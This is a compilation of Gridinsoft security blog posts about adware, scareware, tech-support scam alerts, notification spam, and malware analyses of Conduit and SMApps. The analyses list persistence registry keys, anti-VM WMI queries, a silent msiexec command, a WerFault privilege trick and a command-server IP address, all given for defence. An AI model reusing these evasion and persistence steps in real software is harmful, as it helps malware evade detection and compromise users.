Advanced Window Manager is not technically a virus but is classified as a potentially unwanted program (PUP) or adware. While it doesn’t typically damage your system directly like ransomware or trojans, it degrades your browsing experience, invades your privacy by tracking your online activities, and can expose you to malicious content through its advertisements. Many security products detect and flag it as a threat.

How did Advanced Window Manager get installed on my computer?

Advanced Window Manager typically enters systems through software bundling – it’s quietly included with free software downloads where users rush through installation steps without reading carefully. It may also be installed through malvertising (malicious advertisements) that trick users into clicking download buttons, or through deceptive pop-ups claiming your system needs an update or optimization. Always choose custom installation options and read each step when installing new software.

Can Advanced Window Manager steal my personal information?

While Advanced Window Manager doesn’t directly steal passwords or banking details, it does collect browsing data including search queries, websites visited, IP addresses, and geographic location. This information is typically sold to third parties for targeted advertising purposes. The program may also inject advertisements that lead to phishing sites designed to steal sensitive information. For these reasons, it’s important to remove it promptly.

The post How to Remove Advanced Window Manager Adware appeared first on Gridinsoft Blog.

What is Scareware?

Scareware is a scam that plays on fears of inexperienced users. Although computer viruses are an obsolete type of malware, and you will hardly catch one nowadays even if you try, they remain a horror story for people. And the least you know about a threat, the easier it can scare you.

Both trustworthy and scam security products are promoted via advertising. An advertisement of a good solution will respect the customer and make stress on qualities and features of the promoted program. In the worst case – it will explain that there are many threats out there on the Web, and each endpoint needs protection. The scareware, on the contrary, will try convincing you that your computer is already infected with malware. Moreover, pushy ads will insist on immediate installation of the program they represent, as if it were a last chance to cure your pc.

The profitability of the scheme is understandable. People get scared, buy the program and feel like the defenders of their computer system. Perhaps later, the apprehension will come that they just threw away their money, but they will no longer be able to get it back. There are usually many victims of such deception, and that is the very thing on which the scam relies.

Sadly, losing money is not the worst thing that can happen. Sometimes such malvertising used as a filter: whoever bought into this definitely does not have an actual antivirus. Accordingly, those agents who do business on the distribution of adware and malware can safely install a bunch of harmful programs on the victim’s device.

How Scareware Works

It all starts with a person suddenly seeing an advertising banner on some website. The banner itself looks like an automatic notification. Novice users may not even understand that they are dealing with an advertisement.

The message usually says that a scan of the user’s computer was carried out, which found infection with dangerous malware. Already here, a knowledgeable person could have laughed because not only is it impossible to scan the device so quickly, but it would also be problematic to do it remotely without preliminary procedures.

But charlatans deal with inexperienced people and therefore continue their psychological attack. The banners usually include very serious-looking malware names, tables, codes, etc. The more serious the picture looks, the stronger the effect. In all its appearance, the message tries to appear automatic. You can see, for example, this caption: “threat level: high“, as if the same plate could give out a reassuring “low“.

Such schemes are generally built on a series of psychological techniques. Intimidation is only the first of them. The use of colors plays with the victim’s emotions. Red stands for anything related to threats. As soon as the “rescue” program enters the scene, a soothing blue or green color appears. This feeling of possible safety encourages the user to make a purchase. In addition, the price is low. Most scareware schemes rely on the possibility of quick payments combined with a vast number of buyers.

Alternative Scams

There may be more time-consuming schemes for the crooks. For example, they might launch a massive campaign offering free device scans. To take one, the user must first download the software, the functionality of which will be limited until the program is purchased. So that this payment is still made, the scan will produce frightening results. This approach counts on more educated users.

By the way, the scope of scareware is not limited to the security sector. You can imagine other types of scareware, such as cleaners, that will scare users by saying: “look, a little more, and your system will get so clogged with the garbage that the device will start freezing.” The advertised program will be able to delete unused applications, temporary files, etc.

The programs in question can remain completely fake without an iota of the promised functionality. All “treatment” of the device, just like the initial intimidation, can be just a visual effect.

What are The Threats?

Theoretically, the victim of scareware could get lucky, and the only problem would be the wasted money. But more often than not, a deceptive program will leave an unpleasant payload behind. Its severity may vary. In fact, it corresponds to the degree of danger from the unwanted or overtly malicious software that scareware can fetch onto the victim’s computer. In most cases, installing a scareware application will decrease the PC’s running speed. We’ll be coming from the guess that scareware developers want understandable profit from their victims, not reduced to the price of the application.

This goal implies infecting the device with either of the malware types:

• Adware is a class of relatively harmless unwanted applications. They flood users with ad banners, modify browsers’ settings, add ad links on webpages, etc.
• Spyware is a more significant threat. Hidden software collects information about the system and the user’s activity to send it to people who can commercially benefit from having it. o
• Miners are the programs that steal computing resources of the victim’s machine and throw them at mining cryptocurrency (for somebody else, of course.) The injured side will also be surprised by the electricity consumption rate.
• Cybercriminals can add the infected device to the botnet, a controlled network, to perform certain activities on the web unbeknownst to the user.
• Ransomware is probably the worst case. This malware encodes all data files on the victim’s computer, and the only chance to get them back is to buy a key from the racketeers.

Criminals can drop many other types of malware into the unaware victim’s system. However, those are more suitable for targeted attacks and require hackers’ special attention. The malware mentioned above can work and bring profit automatically.

How not to be fooled by scareware?

• Install an modern antivirus software. GridinSoft Anti-Malware is one of the best solutions on the market due to the combination of technical efficiency and cost-effectiveness. Its virus libraries are regularly updated so that whichever malware becomes recognized in the world, Anti-Malware will know how to deal with it. The program can perform a deep scanning, work in on-run protection mode, and be a security measure for safe Internet browsing.
• Know right before you get scammed. The scareware schemes work only because of people’s ignorance. You don’t need to be a hacker or even an advanced user. Just take a simple course on Internet surfing from someone more experienced in it.
• Don’t visit dubious websites and avoid clicking on ad banners whatsoever. You can hardly encounter malicious advertising, which scareware surely is, on trustworthy websites like Google, Youtube or Facebook. It’s not that you should limit your surfing to these three sites, but they can serve as an example of a trustworthy website appearance. As soon as you see ad banners popping up all around you, flashing and glaring, proceed with great caution if you need to.
• Install ad-blocking software. It goes as an extension to your browser that blocks advertising banners from rendering. It might save you a lot of nerve cells.
• If you happen to buy a scareware product, make sure you remove it as you usually remove an application. In Windows, press Start > Settings > Apps > Apps & Features Choose the app you want to remove, and then select Uninstall. After removing the scareware, carry out an antivirus scan to get rid of any accompanying malware.

The post Scareware: How to Identify, Prevent and Remove It appeared first on Gridinsoft Blog.

But how can they do it with a single banner? That article will show you the whole mechanism and will also explain why this notification appears so obsessively.

Pornographic virus alert from Microsoft: How it works and why is it malicious?

Once upon a time, after opening the browser, you may see the banner which says that your PC is infected with awful viruses. As you can suppose by the name of this alert, it also states that this virus got on your PC from pornographic websites. To eliminate this malware, “Microsoft” offers you to contact their support by the number they specified in the text. As they assure you, you cannot fix your computer without calling support. And here is the first suspicious element – times when the viruses may get into the PC exactly after opening the website are gone.

It was possible at the beginning of the ’00s when the browsers were raw and had a huge amount of vulnerabilities. One of these security breaches allowed to start of file downloads and installations without the user allowance. But hold on, here are more interesting moments.

Calling the support as a sign of the malevolency of this banner

First thing is the number this banner offers as an official Microsoft helpline to reactivate your Windows. It is completely different from the one which is published on the Microsoft website. When you call this number, you will hear a “support” that will offer you to grant him remote access to your PC. Sometimes, such action is needed – when some of the program components are working wrong on the specific PC configuration. But when we are talking about the viruses, which are already detected (as the banner says), the need for a remote connection to your PC is very questionable.

Finally, things are getting really ridiculous. The support checks your PC and then says that you really have a lot of viruses. To remove them, you need to install a perfect solution they can offer you only today – an unknown (or low-trusted) antivirus. They can send you a link or even install it themselves, using the remote control. Installing the unknown software was never a pleasant experience. And all these strange moments surely show that this thing is not one you can trust. Usually, the program this “support” offers you is an example of typical scareware. This sort of program mimics the antivirus app and shows you tons of false detections.

The total possible danger of pornographic virus alert from Microsoft

Let’s count. The first danger the user carries is remote access. The user who gets the ability to manage your PC can do everything literally – delete your files, modify your settings, install any programs from any sources – he is a king now. Granting remote access must always be well-weighted because of the dangers it carries. Nonetheless, a lot of users ignore that security rule and give access to anyone who offers help.

Moving on. Scareware may look like a considerably non-dangerous but annoying app. But let this app stay active in your system for about 30 minutes, and you will not be able to use the PC as usual. Because of its malevolent nature, this unwanted program randomly blocks the elements of important applications. Hence, you can’t use the program as usual. To remove these “malicious and vulnerable items”, you need to purchase the full version of this pseudo-antivirus. Moreover, you can’t uninstall a program as usual – through the application list. Manual removal or antimalware software usage is the only option.

Danger #0. Source malware.

And the last one, which must be the first. I have missed mentioning the initiator of that event – adware. The pornographic virus alert from Microsoft cannot appear independently on your PC. Access to this page will just be blocked by the web browser you use. So, it is quite easy to conclude that something changed your browser configuration and networking settings to show you this banner every time you open your web browser. Adware is a kind of virus that usually does the same, that’s why I supposed it’s present. The way you get this virus on your PC may be different, and you can read the removal guide in that post. Fortunately, the adware can easily be removed with anti-malware software.

The thing you can do to get rid of the banner at the moment is to close the browser window or reboot the PC. Radical ways, but pretty effective against this sort of scam. Usually, that banner does not have any “close” buttons at the top right corner. Don’t worry – the notifications that “Microsoft Locked This Computer” are 100% lies. Still, neither viruses nor companies can block the computer through the Chrome browser. To prevent the browser appearance it is better to avoid using dubious sites. Things like torrent trackers or sites for YouTube videos downloading may redirect you to other pages, and this nasty thing is just among them.

The post Pornographic Virus Alert From Microsoft appeared first on Gridinsoft Blog.

PUA:Win32/Conduit Overview

PUA:Win32/Conduit (also goes by PUAAdvertising:Win32/Conduit) is a potentially unwanted application belonging to Conduit Search. One of Conduit’s characteristic features is unwanted activity on the user’s device. It installs additional software and changes current web browser settings without the user’s knowledge, which makes it a typical representative of a browser hijacker. At the same time, it is not easy to remove all this.

Conduit PUA usually changes the browser’s homepage and search engine to search.conduit[.]com without the user’s consent. It also installs a toolbar in some browsers, which can lead to unsolicited redirects to websites containing adverts or malware. In addition, Conduit often collects information about a user’s online activity, such as the history of websites visited, search queries entered, etc. As a result, this information may be used without the owner’s permission for fraudulent purposes or shared with third parties.

Technical Analysis

Let’s see how this infection behaves, using the example of a sample that masquerades as a ScreenHunter screen capture application.

The malware, represented by %SAMPLEPATH%\19a6fab0b940ce5a1334a9ec80aeae1e1d585a15d9eccc5cbc75ec972edd1269.exe, accepts command line arguments to control its behavior. It links many functions at runtime on Windows: This indicates that the malware dynamically links libraries and functions during runtime, making it harder to detect statically.

Persistence And Privilege Escalation

Next, the malware establishes persistence by creating an undocumented autostart registry key:

HKEY_CURRENT_USER\Software\Wisdom-soft\toolbar

The malware stores files in the Windows startup directory to ensure its execution upon system boot. Attempting to load missing DLLs can be observed, indicating potential evasion techniques or ensuring the malware’s functionality. It dropped the following files to the %USERPROFILE%\AppData\Local\Temp\ folder:

~GLH0002.TMP
GLCAB3D.tmp
GLKAB48.tmp
GLH0007.TMP
GLC46CA.tmp

Conduit creates a process in suspended mode, suggesting code injection techniques for more stealthy execution. This tactic is often used by dropper malware.

Defense Evasion

As for evading detection, it’s standard for unwanted apps – Conduit encodes data using XOR to encode data, potentially to obfuscate its activities and evade detection. It also uses software packing techniques to compress and encrypt its executables, making analysis and detection more difficult.

Unwanted Activity

Installs an Internet Explorer URL search hook. This allows it to monitor and intercept web traffic, potentially capturing user browsing habits or sensitive information. Next, the application installs browser toolbars and helper objects to integrate the malware with the Internet Explorer browser by installing toolbars and browser helper objects. Such modifications can lead to unwanted browser behavior, including redirections, intrusive advertisements, and user data compromise.

Additionally, by modifying registry keys and values that belong to the web browser, Conduit malware adds one more layer of persistence and detection evasion. These tricks allow the unwanted program to keep working even if something deletes the files from autostart values/folders. To achieve this, malicious program plays with the following registry keys:

HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS
HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS

How To Remove PUA:Win32/Conduit?

To remove PUA:Win32/Conduit, it is best to use an advanced solution. GridinSoft Anti-Malware is the best option because, in addition to removing unwanted software, it will reset web browsers in a couple of clicks. Moreover, GridinSoft Anti-Malware will provide your device with proactive protection.

The post PUA:Win32/Conduit appeared first on Gridinsoft Blog.

This malware uses different detection evasion, anti-analysis, and persistence tactics. Although primarily positioned as adware, it can deliver other adware-like applications and log keystrokes.

SMApps Overview

SMApps is malware that falls under the designation of adware and browser hijackers. This malware mainly targets altering web browser settings, mainly ones around search engines and homepages. After typing a search query on Google.com, a redirect to Bangsearch[.]pro occurs instead of the expected search results.

Aside from Bangsearch, SMApps can promote literally any other engine, depending on who pays. Even when it throws the user to Yahoo or Bing, the results appear to be altered and may contain harmful content. In addition, fake search systems often collect sensitive user data, to a much bigger extent than more usual search providers.

At first glance, it may appear to be just annoying, as the majority of adware viruses. However, this is different. Detailed analysis has shown that SMApps can steal sensitive information from the victim’s device and redirect search queries. It can capture keystrokes, collect process information, and install additional payload (usually other adware). This thing’s removal is tricky regardless of the infection path because the malware uses various tricks to avoid this. I’ve made my analysis of this threat, finding all the tricks it does in the infected system – you can see it below.

Key spreading places for SMApps virus are websites that distribute hacked software, and malicious ads. Shady pages with add-ons or mods to popular games do their contribute to this malware spreading. Moreover, this thing can spread by itself, replicating the files to USB drives, effectively acting like a worm, so be careful with what you plug into your USB port.

Technical Analysis

It was not hard to retrieve the sample of SMApps – malware analysis platforms are filled with its samples. This one was some kind of a hack for Roblox, which checks up with what I’ve found about spreading ways. Let’s peek into its internals and in-system activities.

Initial Access

The Initial Access stage involves SMApps using various methods to gain a foothold in the target system. In the next stage, attackers may use Windows Management Instrumentation to query sensitive video device information or check if an antivirus program is installed. This acts as both system fingerprinting and analysis/VM evasion step:

IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

This is often done to detect virtual machines. It also queries the firmware table information and checks if the current process is being debugged. Additionally, it queries disk information to detect virtual machines. To hinder dynamic analysis, the program may contain medium and long sleep (>= 30 seconds and >= 3 minutes respectively) and use evasive loops.

Persistence & Privilege Escalation

SMApps gains persistence via creating or modifying Windows services, registry run keys, and startup folders.

It calls for Windows Installer to arrange its further execution, hiding the window through the command line arguments.

"C:\Windows\system32\msiexec.exe" /I "C:\Users\\AppData\Local\Temp\tmphphvtapd" /qb ACCEPTEULA=1 LicenseAccepted=1

To gain more persistence and additional privileges, this program calls for Windows Error Reporting service. This trick is rather popular these days, as it abuses the ability to relaunch the process with top privileges without calling for a UAC window.

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7280 -ip 7280
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3300 -ip 3300

Command Server Connection, Additional Installations

As for communications with C2, SMApps use FTP protocol and a list of pre-determined addresses to connect to. In my case, the 162.250.124.82:21 address was a primary server. However, the connection cannot boast of any rich logs – malware just sends the info about the infected system. However, more interesting stuff surfaced after giving the thing to run in the background.

As I said above, SMApps can act as a dropper. It dropped two files after installation:

IdealWeightOperator.exe
IdealWeightService.exe

These two malicious programs are pretty much the same as SMApps itself in terms of functionality. They change browser settings on top of what the original thing does, promoting questionable sites and spawning unwanted ads. Even though these threats are not really severe, the fact that it is capable of doing so is concerning.

How To Remove SMApps?

To remove SMApps, you need an effective antivirus solution. I recommend GridinSoft Anti-Malware as it will help remove this malware without much effort. Users report problems with removing this malware with the manual approach, therehence a specialized tool is required. GridinSoft program will also allow you to reset your browser in two clicks. This is especially effective when the browser has been interfered with by adware.

The post SMApps Virus appeared first on Gridinsoft Blog.

Let’s figure out what this scam is, and how to stop Re-Captha-Version pop-ups.

What are Re-Captha-Version pop-up notifications?

Re-Captha-Version is a browser notification spam campaign that takes place on an eponymous website. An entire network of such sites has similar names and content. All of them aim at one thing – forcing users to allow notifications, under the guise of anti-robot captcha. This makes possible the main course of this scam – huge numbers of pop-ups that flood both the web browser and system notifications.

List of domains involved in the scam

Websites like Re-Captha-Version commonly appear after the redirection from another site, or following the click on the suspicious banner somewhere on the Web. If you try visiting such websites apart from the malicious redirections, they will likely return a white screen or various error messages. In some cases, they work, but the content is the same as the first time – just the offer to enable pop-up notifications.

But what for all this is running? Promotions that such websites show are extremely cheap, but their volume multiplied by the number of victims gives quite a substantial profit. Considering that these frauds will advertise other malicious actors, the profit may be smeared through several cybercriminal groups. And while there are ways to earn more, and in a legitimate way, pop-up spam campaigns are extremely easy to run. This is what causes these fraudulent sites to keep going.

How dangerous are Re-Captha-Version pop-up notifications?

Despite what they look like, pop-ups are a rather dangerous thing, especially when dozens of them appear in a short period. The main effect is distraction: pop-ups will keep appearing even after closing the browser. They clutter the notification tray, making it impossible to find the alerts you need.

But the key danger hides in the content of those promotions. Pages and offers they promote are not even remotely relevant. Moreover, the links these advertisements lead to are often just clickbait websites or outright phishing pages. The longer all this happens, the more likely for the user to accidentally click one and get into a sticky situation.

How to remove Re-Captha-Version?

Removing pop-ups from the browser involves two steps – disallowing sending notifications to all sites and scanning your system for threats. The first one is manual – you need to go to your browser settings, open the page with notification settings and delete all entries there. Then, reload your browser for the changes to take effect.

Disabling browser pop-ups (scroll images)

For the second step – scanning for threats – I recommend using GridinSoft Anti-Malware. Ads can lead to the installation of unwanted software. But aside from this, the appearance of Re-Captha-Version website may be the sign of adware activity. To ensure that your device is clean, run a Standard scan and let it finish – it won’t take long.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Re-Captha-Version Pop-Up Virus appeared first on Gridinsoft Blog.